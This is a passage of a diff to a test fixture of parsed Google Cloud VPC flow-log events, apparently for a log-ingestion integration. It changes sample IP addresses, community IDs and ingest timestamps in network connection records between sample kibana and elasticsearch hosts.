"{\"insertId\":\"y4wffpfk2eror\",\"jsonPayload\":{\"bytes_sent\":\"158811\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"69\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", "end": "2019-06-14T03:49:37.965119632Z", @@ -9350,18 +9350,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33880, "bytes": 13455, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 81 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Kk7/PaNTTm0JkSjavpifN6V8b2s=", + "community_id": "1:p34w66dg33j2mO1tBhizc/ISlFM=", "bytes": 13455, "name": "default", "transport": "tcp", @@ -9383,7 +9383,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -9420,8 +9420,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868758800Z", - "original": "{\"insertId\":\"y4wffpfk2erob\",\"jsonPayload\":{\"bytes_sent\":\"13455\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"81\",\"reporter\":\"DEST\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391668700Z", + "original": "{\"insertId\":\"y4wffpfk2erob\",\"jsonPayload\":{\"bytes_sent\":\"13455\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33880},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"81\",\"reporter\":\"DEST\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", "end": "2019-06-14T03:49:51.821047175Z", @@ -9442,9 +9442,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 57300, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -9458,7 +9458,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h/SRCB44wNMtbU2v3aeGitgKFRo=", + "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -9473,7 +9473,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -9497,8 +9497,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868762100Z", - "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391674600Z", + "original": "{\"insertId\":\"y4wffpfk2erox\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":57300,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:48:22.044604322Z", "end": "2019-06-14T03:48:22.156322353Z", @@ -9527,17 +9527,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65315, "bytes": 71014, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 728 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EHEo9aOjBBeD5qcMBbJM+L2kBW8=", + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", "bytes": 71014, "transport": "tcp", "type": "ipv4", @@ -9551,7 +9551,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -9576,8 +9576,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868765300Z", - "original": "{\"insertId\":\"y4wffpfk2eroc\",\"jsonPayload\":{\"bytes_sent\":\"71014\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65315},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"210\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391680200Z", + "original": "{\"insertId\":\"y4wffpfk2eroc\",\"jsonPayload\":{\"bytes_sent\":\"71014\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65315},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"210\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", "end": "2019-06-14T03:49:56.220720811Z", @@ -9598,10 +9598,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -9615,7 +9615,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VqjLGbDeItVznngxat3pnPeGkec=", + "community_id": "1:Z4JXA8xt+j3ewQW8WvNJAPaHMoA=", "bytes": 60749, "name": "default", "transport": "tcp", @@ -9638,7 +9638,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -9674,8 +9674,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868768300Z", - "original": "{\"insertId\":\"y4wffpfk2erok\",\"jsonPayload\":{\"bytes_sent\":\"60749\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391685700Z", + "original": "{\"insertId\":\"y4wffpfk2erok\",\"jsonPayload\":{\"bytes_sent\":\"60749\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -9696,10 +9696,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33880, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9713,7 +9713,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Kk7/PaNTTm0JkSjavpifN6V8b2s=", + "community_id": "1:p34w66dg33j2mO1tBhizc/ISlFM=", "bytes": 160451, "name": "default", "transport": "tcp", @@ -9736,7 +9736,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -9772,8 +9772,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868771500Z", - "original": "{\"insertId\":\"y4wffpfk2eros\",\"jsonPayload\":{\"bytes_sent\":\"160451\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821138391Z\",\"packets_sent\":\"66\",\"reporter\":\"SRC\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391691100Z", + "original": "{\"insertId\":\"y4wffpfk2eros\",\"jsonPayload\":{\"bytes_sent\":\"160451\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821138391Z\",\"packets_sent\":\"66\",\"reporter\":\"SRC\",\"rtt_msec\":\"252\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470071135Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470071135Z", "end": "2019-06-14T03:49:51.821138391Z", @@ -9800,18 +9800,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 169173, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 64 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:UPRJyBawh4JbZzzvBFfenzP0Yco=", + "community_id": "1:yy2U6IJ6o+0ezyD0HfX5dcSPTyA=", "bytes": 169173, "name": "default", "transport": "tcp", @@ -9833,7 +9833,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -9870,8 +9870,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868784300Z", - "original": "{\"insertId\":\"y4wffpfk2erod\",\"jsonPayload\":{\"bytes_sent\":\"169173\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"64\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391696900Z", + "original": "{\"insertId\":\"y4wffpfk2erod\",\"jsonPayload\":{\"bytes_sent\":\"169173\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"64\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -9894,9 +9894,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65315, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9910,7 +9910,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EHEo9aOjBBeD5qcMBbJM+L2kBW8=", + "community_id": "1:Q4aMH1aaXCHezhMNJFHYthlXz1Y=", "bytes": 118762, "transport": "tcp", "type": "ipv4", @@ -9925,7 +9925,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -9949,8 +9949,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868789Z", - "original": "{\"insertId\":\"y4wffpfk2ero6\",\"jsonPayload\":{\"bytes_sent\":\"118762\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65315,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"210\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391701100Z", + "original": "{\"insertId\":\"y4wffpfk2ero6\",\"jsonPayload\":{\"bytes_sent\":\"118762\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65315,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220720811Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"210\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.844068405Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.844068405Z", "end": "2019-06-14T03:49:56.220720811Z", @@ -9971,10 +9971,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -9988,7 +9988,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:8dEsdSCqyZDg8ZlrEARjkF61tVk=", + "community_id": "1:8HPuUT0Nn+eIY1y5PdvmF0aw60A=", "bytes": 11137, "name": "default", "transport": "tcp", @@ -10011,7 +10011,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -10047,8 +10047,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868792700Z", - "original": "{\"insertId\":\"y4wffpfk2eron\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"96\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391705500Z", + "original": 